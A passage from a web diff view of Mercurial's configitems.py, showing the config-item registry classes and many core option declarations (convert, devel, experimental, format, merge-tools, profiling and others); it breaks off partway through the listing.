##// END OF EJS Templates
util: provide a helper function to estimate RAM size...
Joerg Sonnenberger -
r45607:cfe0f491 default draft
parent child Browse files
Show More
@@ -1,1578 +1,1582 b''
1 1 # configitems.py - centralized declaration of configuration option
2 2 #
3 3 # Copyright 2017 Pierre-Yves David <pierre-yves.david@octobus.net>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import functools
11 11 import re
12 12
13 13 from . import (
14 14 encoding,
15 15 error,
16 16 )
17 17
18 18
19 19 def loadconfigtable(ui, extname, configtable):
20 20 """update config item known to the ui with the extension ones"""
21 21 for section, items in sorted(configtable.items()):
22 22 knownitems = ui._knownconfig.setdefault(section, itemregister())
23 23 knownkeys = set(knownitems)
24 24 newkeys = set(items)
25 25 for key in sorted(knownkeys & newkeys):
26 26 msg = b"extension '%s' overwrite config item '%s.%s'"
27 27 msg %= (extname, section, key)
28 28 ui.develwarn(msg, config=b'warn-config')
29 29
30 30 knownitems.update(items)
31 31
32 32
33 33 class configitem(object):
34 34 """represent a known config item
35 35
36 36 :section: the official config section where to find this item,
37 37 :name: the official name within the section,
38 38 :default: default value for this item,
39 39 :alias: optional list of tuples as alternatives,
40 40 :generic: this is a generic definition, match name using regular expression.
41 41 """
42 42
43 43 def __init__(
44 44 self,
45 45 section,
46 46 name,
47 47 default=None,
48 48 alias=(),
49 49 generic=False,
50 50 priority=0,
51 51 experimental=False,
52 52 ):
53 53 self.section = section
54 54 self.name = name
55 55 self.default = default
56 56 self.alias = list(alias)
57 57 self.generic = generic
58 58 self.priority = priority
59 59 self.experimental = experimental
60 60 self._re = None
61 61 if generic:
62 62 self._re = re.compile(self.name)
63 63
64 64
65 65 class itemregister(dict):
66 66 """A specialized dictionary that can handle wild-card selection"""
67 67
68 68 def __init__(self):
69 69 super(itemregister, self).__init__()
70 70 self._generics = set()
71 71
72 72 def update(self, other):
73 73 super(itemregister, self).update(other)
74 74 self._generics.update(other._generics)
75 75
76 76 def __setitem__(self, key, item):
77 77 super(itemregister, self).__setitem__(key, item)
78 78 if item.generic:
79 79 self._generics.add(item)
80 80
81 81 def get(self, key):
82 82 baseitem = super(itemregister, self).get(key)
83 83 if baseitem is not None and not baseitem.generic:
84 84 return baseitem
85 85
86 86 # search for a matching generic item
87 87 generics = sorted(self._generics, key=(lambda x: (x.priority, x.name)))
88 88 for item in generics:
89 89 # we use 'match' instead of 'search' to make the matching simpler
90 90 # for people unfamiliar with regular expression. Having the match
91 91 # rooted to the start of the string will produce less surprising
92 92 # result for user writing simple regex for sub-attribute.
93 93 #
94 94 # For example using "color\..*" match produces an unsurprising
95 95 # result, while using search could suddenly match apparently
96 96 # unrelated configuration that happens to contains "color."
97 97 # anywhere. This is a tradeoff where we favor requiring ".*" on
98 98 # some match to avoid the need to prefix most pattern with "^".
99 99 # The "^" seems more error prone.
100 100 if item._re.match(key):
101 101 return item
102 102
103 103 return None
104 104
105 105
106 106 coreitems = {}
107 107
108 108
109 109 def _register(configtable, *args, **kwargs):
110 110 item = configitem(*args, **kwargs)
111 111 section = configtable.setdefault(item.section, itemregister())
112 112 if item.name in section:
113 113 msg = b"duplicated config item registration for '%s.%s'"
114 114 raise error.ProgrammingError(msg % (item.section, item.name))
115 115 section[item.name] = item
116 116
117 117
118 118 # special value for case where the default is derived from other values
119 119 dynamicdefault = object()
120 120
121 121 # Registering actual config items
122 122
123 123
124 124 def getitemregister(configtable):
125 125 f = functools.partial(_register, configtable)
126 126 # export pseudo enum as configitem.*
127 127 f.dynamicdefault = dynamicdefault
128 128 return f
129 129
130 130
131 131 coreconfigitem = getitemregister(coreitems)
132 132
133 133
134 134 def _registerdiffopts(section, configprefix=b''):
135 135 coreconfigitem(
136 136 section, configprefix + b'nodates', default=False,
137 137 )
138 138 coreconfigitem(
139 139 section, configprefix + b'showfunc', default=False,
140 140 )
141 141 coreconfigitem(
142 142 section, configprefix + b'unified', default=None,
143 143 )
144 144 coreconfigitem(
145 145 section, configprefix + b'git', default=False,
146 146 )
147 147 coreconfigitem(
148 148 section, configprefix + b'ignorews', default=False,
149 149 )
150 150 coreconfigitem(
151 151 section, configprefix + b'ignorewsamount', default=False,
152 152 )
153 153 coreconfigitem(
154 154 section, configprefix + b'ignoreblanklines', default=False,
155 155 )
156 156 coreconfigitem(
157 157 section, configprefix + b'ignorewseol', default=False,
158 158 )
159 159 coreconfigitem(
160 160 section, configprefix + b'nobinary', default=False,
161 161 )
162 162 coreconfigitem(
163 163 section, configprefix + b'noprefix', default=False,
164 164 )
165 165 coreconfigitem(
166 166 section, configprefix + b'word-diff', default=False,
167 167 )
168 168
169 169
170 170 coreconfigitem(
171 171 b'alias', b'.*', default=dynamicdefault, generic=True,
172 172 )
173 173 coreconfigitem(
174 174 b'auth', b'cookiefile', default=None,
175 175 )
176 176 _registerdiffopts(section=b'annotate')
177 177 # bookmarks.pushing: internal hack for discovery
178 178 coreconfigitem(
179 179 b'bookmarks', b'pushing', default=list,
180 180 )
181 181 # bundle.mainreporoot: internal hack for bundlerepo
182 182 coreconfigitem(
183 183 b'bundle', b'mainreporoot', default=b'',
184 184 )
185 185 coreconfigitem(
186 186 b'censor', b'policy', default=b'abort', experimental=True,
187 187 )
188 188 coreconfigitem(
189 189 b'chgserver', b'idletimeout', default=3600,
190 190 )
191 191 coreconfigitem(
192 192 b'chgserver', b'skiphash', default=False,
193 193 )
194 194 coreconfigitem(
195 195 b'cmdserver', b'log', default=None,
196 196 )
197 197 coreconfigitem(
198 198 b'cmdserver', b'max-log-files', default=7,
199 199 )
200 200 coreconfigitem(
201 201 b'cmdserver', b'max-log-size', default=b'1 MB',
202 202 )
203 203 coreconfigitem(
204 204 b'cmdserver', b'max-repo-cache', default=0, experimental=True,
205 205 )
206 206 coreconfigitem(
207 207 b'cmdserver', b'message-encodings', default=list,
208 208 )
209 209 coreconfigitem(
210 210 b'cmdserver',
211 211 b'track-log',
212 212 default=lambda: [b'chgserver', b'cmdserver', b'repocache'],
213 213 )
214 214 coreconfigitem(
215 215 b'cmdserver', b'shutdown-on-interrupt', default=True,
216 216 )
217 217 coreconfigitem(
218 218 b'color', b'.*', default=None, generic=True,
219 219 )
220 220 coreconfigitem(
221 221 b'color', b'mode', default=b'auto',
222 222 )
223 223 coreconfigitem(
224 224 b'color', b'pagermode', default=dynamicdefault,
225 225 )
226 226 _registerdiffopts(section=b'commands', configprefix=b'commit.interactive.')
227 227 coreconfigitem(
228 228 b'commands', b'commit.post-status', default=False,
229 229 )
230 230 coreconfigitem(
231 231 b'commands', b'grep.all-files', default=False, experimental=True,
232 232 )
233 233 coreconfigitem(
234 234 b'commands', b'merge.require-rev', default=False,
235 235 )
236 236 coreconfigitem(
237 237 b'commands', b'push.require-revs', default=False,
238 238 )
239 239 coreconfigitem(
240 240 b'commands', b'resolve.confirm', default=False,
241 241 )
242 242 coreconfigitem(
243 243 b'commands', b'resolve.explicit-re-merge', default=False,
244 244 )
245 245 coreconfigitem(
246 246 b'commands', b'resolve.mark-check', default=b'none',
247 247 )
248 248 _registerdiffopts(section=b'commands', configprefix=b'revert.interactive.')
249 249 coreconfigitem(
250 250 b'commands', b'show.aliasprefix', default=list,
251 251 )
252 252 coreconfigitem(
253 253 b'commands', b'status.relative', default=False,
254 254 )
255 255 coreconfigitem(
256 256 b'commands', b'status.skipstates', default=[], experimental=True,
257 257 )
258 258 coreconfigitem(
259 259 b'commands', b'status.terse', default=b'',
260 260 )
261 261 coreconfigitem(
262 262 b'commands', b'status.verbose', default=False,
263 263 )
264 264 coreconfigitem(
265 265 b'commands', b'update.check', default=None,
266 266 )
267 267 coreconfigitem(
268 268 b'commands', b'update.requiredest', default=False,
269 269 )
270 270 coreconfigitem(
271 271 b'committemplate', b'.*', default=None, generic=True,
272 272 )
273 273 coreconfigitem(
274 274 b'convert', b'bzr.saverev', default=True,
275 275 )
276 276 coreconfigitem(
277 277 b'convert', b'cvsps.cache', default=True,
278 278 )
279 279 coreconfigitem(
280 280 b'convert', b'cvsps.fuzz', default=60,
281 281 )
282 282 coreconfigitem(
283 283 b'convert', b'cvsps.logencoding', default=None,
284 284 )
285 285 coreconfigitem(
286 286 b'convert', b'cvsps.mergefrom', default=None,
287 287 )
288 288 coreconfigitem(
289 289 b'convert', b'cvsps.mergeto', default=None,
290 290 )
291 291 coreconfigitem(
292 292 b'convert', b'git.committeractions', default=lambda: [b'messagedifferent'],
293 293 )
294 294 coreconfigitem(
295 295 b'convert', b'git.extrakeys', default=list,
296 296 )
297 297 coreconfigitem(
298 298 b'convert', b'git.findcopiesharder', default=False,
299 299 )
300 300 coreconfigitem(
301 301 b'convert', b'git.remoteprefix', default=b'remote',
302 302 )
303 303 coreconfigitem(
304 304 b'convert', b'git.renamelimit', default=400,
305 305 )
306 306 coreconfigitem(
307 307 b'convert', b'git.saverev', default=True,
308 308 )
309 309 coreconfigitem(
310 310 b'convert', b'git.similarity', default=50,
311 311 )
312 312 coreconfigitem(
313 313 b'convert', b'git.skipsubmodules', default=False,
314 314 )
315 315 coreconfigitem(
316 316 b'convert', b'hg.clonebranches', default=False,
317 317 )
318 318 coreconfigitem(
319 319 b'convert', b'hg.ignoreerrors', default=False,
320 320 )
321 321 coreconfigitem(
322 322 b'convert', b'hg.preserve-hash', default=False,
323 323 )
324 324 coreconfigitem(
325 325 b'convert', b'hg.revs', default=None,
326 326 )
327 327 coreconfigitem(
328 328 b'convert', b'hg.saverev', default=False,
329 329 )
330 330 coreconfigitem(
331 331 b'convert', b'hg.sourcename', default=None,
332 332 )
333 333 coreconfigitem(
334 334 b'convert', b'hg.startrev', default=None,
335 335 )
336 336 coreconfigitem(
337 337 b'convert', b'hg.tagsbranch', default=b'default',
338 338 )
339 339 coreconfigitem(
340 340 b'convert', b'hg.usebranchnames', default=True,
341 341 )
342 342 coreconfigitem(
343 343 b'convert', b'ignoreancestorcheck', default=False, experimental=True,
344 344 )
345 345 coreconfigitem(
346 346 b'convert', b'localtimezone', default=False,
347 347 )
348 348 coreconfigitem(
349 349 b'convert', b'p4.encoding', default=dynamicdefault,
350 350 )
351 351 coreconfigitem(
352 352 b'convert', b'p4.startrev', default=0,
353 353 )
354 354 coreconfigitem(
355 355 b'convert', b'skiptags', default=False,
356 356 )
357 357 coreconfigitem(
358 358 b'convert', b'svn.debugsvnlog', default=True,
359 359 )
360 360 coreconfigitem(
361 361 b'convert', b'svn.trunk', default=None,
362 362 )
363 363 coreconfigitem(
364 364 b'convert', b'svn.tags', default=None,
365 365 )
366 366 coreconfigitem(
367 367 b'convert', b'svn.branches', default=None,
368 368 )
369 369 coreconfigitem(
370 370 b'convert', b'svn.startrev', default=0,
371 371 )
372 372 coreconfigitem(
373 373 b'debug', b'dirstate.delaywrite', default=0,
374 374 )
375 375 coreconfigitem(
376 376 b'defaults', b'.*', default=None, generic=True,
377 377 )
378 378 coreconfigitem(
379 379 b'devel', b'all-warnings', default=False,
380 380 )
381 381 coreconfigitem(
382 382 b'devel', b'bundle2.debug', default=False,
383 383 )
384 384 coreconfigitem(
385 385 b'devel', b'bundle.delta', default=b'',
386 386 )
387 387 coreconfigitem(
388 388 b'devel', b'cache-vfs', default=None,
389 389 )
390 390 coreconfigitem(
391 391 b'devel', b'check-locks', default=False,
392 392 )
393 393 coreconfigitem(
394 394 b'devel', b'check-relroot', default=False,
395 395 )
396 396 coreconfigitem(
397 397 b'devel', b'default-date', default=None,
398 398 )
399 399 coreconfigitem(
400 400 b'devel', b'deprec-warn', default=False,
401 401 )
402 402 coreconfigitem(
403 403 b'devel', b'disableloaddefaultcerts', default=False,
404 404 )
405 405 coreconfigitem(
406 406 b'devel', b'warn-empty-changegroup', default=False,
407 407 )
408 408 coreconfigitem(
409 409 b'devel', b'legacy.exchange', default=list,
410 410 )
411 411 coreconfigitem(
412 412 b'devel', b'persistent-nodemap', default=False,
413 413 )
414 414 coreconfigitem(
415 415 b'devel', b'servercafile', default=b'',
416 416 )
417 417 coreconfigitem(
418 418 b'devel', b'serverexactprotocol', default=b'',
419 419 )
420 420 coreconfigitem(
421 421 b'devel', b'serverrequirecert', default=False,
422 422 )
423 423 coreconfigitem(
424 424 b'devel', b'strip-obsmarkers', default=True,
425 425 )
426 426 coreconfigitem(
427 427 b'devel', b'warn-config', default=None,
428 428 )
429 429 coreconfigitem(
430 430 b'devel', b'warn-config-default', default=None,
431 431 )
432 432 coreconfigitem(
433 433 b'devel', b'user.obsmarker', default=None,
434 434 )
435 435 coreconfigitem(
436 436 b'devel', b'warn-config-unknown', default=None,
437 437 )
438 438 coreconfigitem(
439 439 b'devel', b'debug.copies', default=False,
440 440 )
441 441 coreconfigitem(
442 442 b'devel', b'debug.extensions', default=False,
443 443 )
444 444 coreconfigitem(
445 445 b'devel', b'debug.repo-filters', default=False,
446 446 )
447 447 coreconfigitem(
448 448 b'devel', b'debug.peer-request', default=False,
449 449 )
450 450 coreconfigitem(
451 451 b'devel', b'discovery.randomize', default=True,
452 452 )
453 453 _registerdiffopts(section=b'diff')
454 454 coreconfigitem(
455 455 b'email', b'bcc', default=None,
456 456 )
457 457 coreconfigitem(
458 458 b'email', b'cc', default=None,
459 459 )
460 460 coreconfigitem(
461 461 b'email', b'charsets', default=list,
462 462 )
463 463 coreconfigitem(
464 464 b'email', b'from', default=None,
465 465 )
466 466 coreconfigitem(
467 467 b'email', b'method', default=b'smtp',
468 468 )
469 469 coreconfigitem(
470 470 b'email', b'reply-to', default=None,
471 471 )
472 472 coreconfigitem(
473 473 b'email', b'to', default=None,
474 474 )
475 475 coreconfigitem(
476 476 b'experimental', b'archivemetatemplate', default=dynamicdefault,
477 477 )
478 478 coreconfigitem(
479 479 b'experimental', b'auto-publish', default=b'publish',
480 480 )
481 481 coreconfigitem(
482 482 b'experimental', b'bundle-phases', default=False,
483 483 )
484 484 coreconfigitem(
485 485 b'experimental', b'bundle2-advertise', default=True,
486 486 )
487 487 coreconfigitem(
488 488 b'experimental', b'bundle2-output-capture', default=False,
489 489 )
490 490 coreconfigitem(
491 491 b'experimental', b'bundle2.pushback', default=False,
492 492 )
493 493 coreconfigitem(
494 494 b'experimental', b'bundle2lazylocking', default=False,
495 495 )
496 496 coreconfigitem(
497 497 b'experimental', b'bundlecomplevel', default=None,
498 498 )
499 499 coreconfigitem(
500 500 b'experimental', b'bundlecomplevel.bzip2', default=None,
501 501 )
502 502 coreconfigitem(
503 503 b'experimental', b'bundlecomplevel.gzip', default=None,
504 504 )
505 505 coreconfigitem(
506 506 b'experimental', b'bundlecomplevel.none', default=None,
507 507 )
508 508 coreconfigitem(
509 509 b'experimental', b'bundlecomplevel.zstd', default=None,
510 510 )
511 511 coreconfigitem(
512 512 b'experimental', b'changegroup3', default=False,
513 513 )
514 514 coreconfigitem(
515 515 b'experimental', b'cleanup-as-archived', default=False,
516 516 )
517 517 coreconfigitem(
518 518 b'experimental', b'clientcompressionengines', default=list,
519 519 )
520 520 coreconfigitem(
521 521 b'experimental', b'copytrace', default=b'on',
522 522 )
523 523 coreconfigitem(
524 524 b'experimental', b'copytrace.movecandidateslimit', default=100,
525 525 )
526 526 coreconfigitem(
527 527 b'experimental', b'copytrace.sourcecommitlimit', default=100,
528 528 )
529 529 coreconfigitem(
530 530 b'experimental', b'copies.read-from', default=b"filelog-only",
531 531 )
532 532 coreconfigitem(
533 533 b'experimental', b'copies.write-to', default=b'filelog-only',
534 534 )
535 535 coreconfigitem(
536 536 b'experimental', b'crecordtest', default=None,
537 537 )
538 538 coreconfigitem(
539 539 b'experimental', b'directaccess', default=False,
540 540 )
541 541 coreconfigitem(
542 542 b'experimental', b'directaccess.revnums', default=False,
543 543 )
544 544 coreconfigitem(
545 545 b'experimental', b'editortmpinhg', default=False,
546 546 )
547 547 coreconfigitem(
548 548 b'experimental', b'evolution', default=list,
549 549 )
550 550 coreconfigitem(
551 551 b'experimental',
552 552 b'evolution.allowdivergence',
553 553 default=False,
554 554 alias=[(b'experimental', b'allowdivergence')],
555 555 )
556 556 coreconfigitem(
557 557 b'experimental', b'evolution.allowunstable', default=None,
558 558 )
559 559 coreconfigitem(
560 560 b'experimental', b'evolution.createmarkers', default=None,
561 561 )
562 562 coreconfigitem(
563 563 b'experimental',
564 564 b'evolution.effect-flags',
565 565 default=True,
566 566 alias=[(b'experimental', b'effect-flags')],
567 567 )
568 568 coreconfigitem(
569 569 b'experimental', b'evolution.exchange', default=None,
570 570 )
571 571 coreconfigitem(
572 572 b'experimental', b'evolution.bundle-obsmarker', default=False,
573 573 )
574 574 coreconfigitem(
575 575 b'experimental', b'log.topo', default=False,
576 576 )
577 577 coreconfigitem(
578 578 b'experimental', b'evolution.report-instabilities', default=True,
579 579 )
580 580 coreconfigitem(
581 581 b'experimental', b'evolution.track-operation', default=True,
582 582 )
583 583 # repo-level config to exclude a revset visibility
584 584 #
585 585 # The target use case is to use `share` to expose different subset of the same
586 586 # repository, especially server side. See also `server.view`.
587 587 coreconfigitem(
588 588 b'experimental', b'extra-filter-revs', default=None,
589 589 )
590 590 coreconfigitem(
591 591 b'experimental', b'maxdeltachainspan', default=-1,
592 592 )
593 593 coreconfigitem(
594 594 b'experimental', b'mergetempdirprefix', default=None,
595 595 )
596 596 coreconfigitem(
597 597 b'experimental', b'mmapindexthreshold', default=None,
598 598 )
599 599 coreconfigitem(
600 600 b'experimental', b'narrow', default=False,
601 601 )
602 602 coreconfigitem(
603 603 b'experimental', b'nonnormalparanoidcheck', default=False,
604 604 )
605 605 coreconfigitem(
606 606 b'experimental', b'exportableenviron', default=list,
607 607 )
608 608 coreconfigitem(
609 609 b'experimental', b'extendedheader.index', default=None,
610 610 )
611 611 coreconfigitem(
612 612 b'experimental', b'extendedheader.similarity', default=False,
613 613 )
614 614 coreconfigitem(
615 615 b'experimental', b'graphshorten', default=False,
616 616 )
617 617 coreconfigitem(
618 618 b'experimental', b'graphstyle.parent', default=dynamicdefault,
619 619 )
620 620 coreconfigitem(
621 621 b'experimental', b'graphstyle.missing', default=dynamicdefault,
622 622 )
623 623 coreconfigitem(
624 624 b'experimental', b'graphstyle.grandparent', default=dynamicdefault,
625 625 )
626 626 coreconfigitem(
627 627 b'experimental', b'hook-track-tags', default=False,
628 628 )
629 629 coreconfigitem(
630 630 b'experimental', b'httppeer.advertise-v2', default=False,
631 631 )
632 632 coreconfigitem(
633 633 b'experimental', b'httppeer.v2-encoder-order', default=None,
634 634 )
635 635 coreconfigitem(
636 636 b'experimental', b'httppostargs', default=False,
637 637 )
638 638 coreconfigitem(
639 639 b'experimental', b'mergedriver', default=None,
640 640 )
641 641 coreconfigitem(b'experimental', b'nointerrupt', default=False)
642 642 coreconfigitem(b'experimental', b'nointerrupt-interactiveonly', default=True)
643 643
644 644 coreconfigitem(
645 645 b'experimental', b'obsmarkers-exchange-debug', default=False,
646 646 )
647 647 coreconfigitem(
648 648 b'experimental', b'remotenames', default=False,
649 649 )
650 650 coreconfigitem(
651 651 b'experimental', b'removeemptydirs', default=True,
652 652 )
653 653 coreconfigitem(
654 654 b'experimental', b'revert.interactive.select-to-keep', default=False,
655 655 )
656 656 coreconfigitem(
657 657 b'experimental', b'revisions.prefixhexnode', default=False,
658 658 )
659 659 coreconfigitem(
660 660 b'experimental', b'revlogv2', default=None,
661 661 )
662 662 coreconfigitem(
663 663 b'experimental', b'revisions.disambiguatewithin', default=None,
664 664 )
665 665 coreconfigitem(
666 666 b'experimental', b'rust.index', default=False,
667 667 )
668 668 coreconfigitem(
669 669 b'experimental', b'server.filesdata.recommended-batch-size', default=50000,
670 670 )
671 671 coreconfigitem(
672 672 b'experimental',
673 673 b'server.manifestdata.recommended-batch-size',
674 674 default=100000,
675 675 )
676 676 coreconfigitem(
677 677 b'experimental', b'server.stream-narrow-clones', default=False,
678 678 )
679 679 coreconfigitem(
680 680 b'experimental', b'single-head-per-branch', default=False,
681 681 )
682 682 coreconfigitem(
683 683 b'experimental',
684 684 b'single-head-per-branch:account-closed-heads',
685 685 default=False,
686 686 )
687 687 coreconfigitem(
688 688 b'experimental', b'sshserver.support-v2', default=False,
689 689 )
690 690 coreconfigitem(
691 691 b'experimental', b'sparse-read', default=False,
692 692 )
693 693 coreconfigitem(
694 694 b'experimental', b'sparse-read.density-threshold', default=0.50,
695 695 )
696 696 coreconfigitem(
697 697 b'experimental', b'sparse-read.min-gap-size', default=b'65K',
698 698 )
699 699 coreconfigitem(
700 700 b'experimental', b'treemanifest', default=False,
701 701 )
702 702 coreconfigitem(
703 703 b'experimental', b'update.atomic-file', default=False,
704 704 )
705 705 coreconfigitem(
706 706 b'experimental', b'sshpeer.advertise-v2', default=False,
707 707 )
708 708 coreconfigitem(
709 709 b'experimental', b'web.apiserver', default=False,
710 710 )
711 711 coreconfigitem(
712 712 b'experimental', b'web.api.http-v2', default=False,
713 713 )
714 714 coreconfigitem(
715 715 b'experimental', b'web.api.debugreflect', default=False,
716 716 )
717 717 coreconfigitem(
718 718 b'experimental', b'worker.wdir-get-thread-safe', default=False,
719 719 )
720 720 coreconfigitem(
721 721 b'experimental', b'worker.repository-upgrade', default=False,
722 722 )
723 723 coreconfigitem(
724 724 b'experimental', b'xdiff', default=False,
725 725 )
726 726 coreconfigitem(
727 727 b'extensions', b'.*', default=None, generic=True,
728 728 )
729 729 coreconfigitem(
730 730 b'extdata', b'.*', default=None, generic=True,
731 731 )
732 732 coreconfigitem(
733 733 b'format', b'bookmarks-in-store', default=False,
734 734 )
735 735 coreconfigitem(
736 736 b'format', b'chunkcachesize', default=None, experimental=True,
737 737 )
738 738 coreconfigitem(
739 739 b'format', b'dotencode', default=True,
740 740 )
741 741 coreconfigitem(
742 742 b'format', b'generaldelta', default=False, experimental=True,
743 743 )
744 744 coreconfigitem(
745 745 b'format', b'manifestcachesize', default=None, experimental=True,
746 746 )
747 747 coreconfigitem(
748 748 b'format', b'maxchainlen', default=dynamicdefault, experimental=True,
749 749 )
750 750 coreconfigitem(
751 751 b'format', b'obsstore-version', default=None,
752 752 )
753 753 coreconfigitem(
754 754 b'format', b'sparse-revlog', default=True,
755 755 )
756 756 coreconfigitem(
757 757 b'format',
758 758 b'revlog-compression',
759 759 default=lambda: [b'zlib'],
760 760 alias=[(b'experimental', b'format.compression')],
761 761 )
762 762 coreconfigitem(
763 763 b'format', b'usefncache', default=True,
764 764 )
765 765 coreconfigitem(
766 766 b'format', b'usegeneraldelta', default=True,
767 767 )
768 768 coreconfigitem(
769 769 b'format', b'usestore', default=True,
770 770 )
771 771 # Right now, the only efficient implement of the nodemap logic is in Rust, so
772 772 # the persistent nodemap feature needs to stay experimental as long as the Rust
773 773 # extensions are an experimental feature.
774 774 coreconfigitem(
775 775 b'format', b'use-persistent-nodemap', default=False, experimental=True
776 776 )
777 777 coreconfigitem(
778 778 b'format',
779 779 b'exp-use-copies-side-data-changeset',
780 780 default=False,
781 781 experimental=True,
782 782 )
783 783 coreconfigitem(
784 784 b'format', b'exp-use-side-data', default=False, experimental=True,
785 785 )
786 786 coreconfigitem(
787 787 b'format', b'internal-phase', default=False, experimental=True,
788 788 )
789 789 coreconfigitem(
790 790 b'fsmonitor', b'warn_when_unused', default=True,
791 791 )
792 792 coreconfigitem(
793 793 b'fsmonitor', b'warn_update_file_count', default=50000,
794 794 )
795 795 coreconfigitem(
796 796 b'help', br'hidden-command\..*', default=False, generic=True,
797 797 )
798 798 coreconfigitem(
799 799 b'help', br'hidden-topic\..*', default=False, generic=True,
800 800 )
801 801 coreconfigitem(
802 802 b'hooks', b'.*', default=dynamicdefault, generic=True,
803 803 )
804 804 coreconfigitem(
805 805 b'hgweb-paths', b'.*', default=list, generic=True,
806 806 )
807 807 coreconfigitem(
808 808 b'hostfingerprints', b'.*', default=list, generic=True,
809 809 )
810 810 coreconfigitem(
811 811 b'hostsecurity', b'ciphers', default=None,
812 812 )
813 813 coreconfigitem(
814 814 b'hostsecurity', b'minimumprotocol', default=dynamicdefault,
815 815 )
816 816 coreconfigitem(
817 817 b'hostsecurity',
818 818 b'.*:minimumprotocol$',
819 819 default=dynamicdefault,
820 820 generic=True,
821 821 )
822 822 coreconfigitem(
823 823 b'hostsecurity', b'.*:ciphers$', default=dynamicdefault, generic=True,
824 824 )
825 825 coreconfigitem(
826 826 b'hostsecurity', b'.*:fingerprints$', default=list, generic=True,
827 827 )
828 828 coreconfigitem(
829 829 b'hostsecurity', b'.*:verifycertsfile$', default=None, generic=True,
830 830 )
831 831
832 832 coreconfigitem(
833 833 b'http_proxy', b'always', default=False,
834 834 )
835 835 coreconfigitem(
836 836 b'http_proxy', b'host', default=None,
837 837 )
838 838 coreconfigitem(
839 839 b'http_proxy', b'no', default=list,
840 840 )
841 841 coreconfigitem(
842 842 b'http_proxy', b'passwd', default=None,
843 843 )
844 844 coreconfigitem(
845 845 b'http_proxy', b'user', default=None,
846 846 )
847 847
848 848 coreconfigitem(
849 849 b'http', b'timeout', default=None,
850 850 )
851 851
852 852 coreconfigitem(
853 853 b'logtoprocess', b'commandexception', default=None,
854 854 )
855 855 coreconfigitem(
856 856 b'logtoprocess', b'commandfinish', default=None,
857 857 )
858 858 coreconfigitem(
859 859 b'logtoprocess', b'command', default=None,
860 860 )
861 861 coreconfigitem(
862 862 b'logtoprocess', b'develwarn', default=None,
863 863 )
864 864 coreconfigitem(
865 865 b'logtoprocess', b'uiblocked', default=None,
866 866 )
867 867 coreconfigitem(
868 868 b'merge', b'checkunknown', default=b'abort',
869 869 )
870 870 coreconfigitem(
871 871 b'merge', b'checkignored', default=b'abort',
872 872 )
873 873 coreconfigitem(
874 874 b'experimental', b'merge.checkpathconflicts', default=False,
875 875 )
876 876 coreconfigitem(
877 877 b'merge', b'followcopies', default=True,
878 878 )
879 879 coreconfigitem(
880 880 b'merge', b'on-failure', default=b'continue',
881 881 )
882 882 coreconfigitem(
883 883 b'merge', b'preferancestor', default=lambda: [b'*'], experimental=True,
884 884 )
885 885 coreconfigitem(
886 886 b'merge', b'strict-capability-check', default=False,
887 887 )
888 888 coreconfigitem(
889 889 b'merge-tools', b'.*', default=None, generic=True,
890 890 )
891 891 coreconfigitem(
892 892 b'merge-tools',
893 893 br'.*\.args$',
894 894 default=b"$local $base $other",
895 895 generic=True,
896 896 priority=-1,
897 897 )
898 898 coreconfigitem(
899 899 b'merge-tools', br'.*\.binary$', default=False, generic=True, priority=-1,
900 900 )
901 901 coreconfigitem(
902 902 b'merge-tools', br'.*\.check$', default=list, generic=True, priority=-1,
903 903 )
904 904 coreconfigitem(
905 905 b'merge-tools',
906 906 br'.*\.checkchanged$',
907 907 default=False,
908 908 generic=True,
909 909 priority=-1,
910 910 )
911 911 coreconfigitem(
912 912 b'merge-tools',
913 913 br'.*\.executable$',
914 914 default=dynamicdefault,
915 915 generic=True,
916 916 priority=-1,
917 917 )
918 918 coreconfigitem(
919 919 b'merge-tools', br'.*\.fixeol$', default=False, generic=True, priority=-1,
920 920 )
921 921 coreconfigitem(
922 922 b'merge-tools', br'.*\.gui$', default=False, generic=True, priority=-1,
923 923 )
924 924 coreconfigitem(
925 925 b'merge-tools',
926 926 br'.*\.mergemarkers$',
927 927 default=b'basic',
928 928 generic=True,
929 929 priority=-1,
930 930 )
931 931 coreconfigitem(
932 932 b'merge-tools',
933 933 br'.*\.mergemarkertemplate$',
934 934 default=dynamicdefault, # take from ui.mergemarkertemplate
935 935 generic=True,
936 936 priority=-1,
937 937 )
938 938 coreconfigitem(
939 939 b'merge-tools', br'.*\.priority$', default=0, generic=True, priority=-1,
940 940 )
941 941 coreconfigitem(
942 942 b'merge-tools',
943 943 br'.*\.premerge$',
944 944 default=dynamicdefault,
945 945 generic=True,
946 946 priority=-1,
947 947 )
948 948 coreconfigitem(
949 949 b'merge-tools', br'.*\.symlink$', default=False, generic=True, priority=-1,
950 950 )
951 951 coreconfigitem(
952 952 b'pager', b'attend-.*', default=dynamicdefault, generic=True,
953 953 )
954 954 coreconfigitem(
955 955 b'pager', b'ignore', default=list,
956 956 )
957 957 coreconfigitem(
958 958 b'pager', b'pager', default=dynamicdefault,
959 959 )
960 960 coreconfigitem(
961 961 b'patch', b'eol', default=b'strict',
962 962 )
963 963 coreconfigitem(
964 964 b'patch', b'fuzz', default=2,
965 965 )
966 966 coreconfigitem(
967 967 b'paths', b'default', default=None,
968 968 )
969 969 coreconfigitem(
970 970 b'paths', b'default-push', default=None,
971 971 )
972 972 coreconfigitem(
973 973 b'paths', b'.*', default=None, generic=True,
974 974 )
975 975 coreconfigitem(
976 976 b'phases', b'checksubrepos', default=b'follow',
977 977 )
978 978 coreconfigitem(
979 979 b'phases', b'new-commit', default=b'draft',
980 980 )
981 981 coreconfigitem(
982 982 b'phases', b'publish', default=True,
983 983 )
984 984 coreconfigitem(
985 985 b'profiling', b'enabled', default=False,
986 986 )
987 987 coreconfigitem(
988 988 b'profiling', b'format', default=b'text',
989 989 )
990 990 coreconfigitem(
991 991 b'profiling', b'freq', default=1000,
992 992 )
993 993 coreconfigitem(
994 994 b'profiling', b'limit', default=30,
995 995 )
996 996 coreconfigitem(
997 997 b'profiling', b'nested', default=0,
998 998 )
999 999 coreconfigitem(
1000 1000 b'profiling', b'output', default=None,
1001 1001 )
1002 1002 coreconfigitem(
1003 1003 b'profiling', b'showmax', default=0.999,
1004 1004 )
1005 1005 coreconfigitem(
1006 1006 b'profiling', b'showmin', default=dynamicdefault,
1007 1007 )
1008 1008 coreconfigitem(
1009 1009 b'profiling', b'showtime', default=True,
1010 1010 )
1011 1011 coreconfigitem(
1012 1012 b'profiling', b'sort', default=b'inlinetime',
1013 1013 )
1014 1014 coreconfigitem(
1015 1015 b'profiling', b'statformat', default=b'hotpath',
1016 1016 )
1017 1017 coreconfigitem(
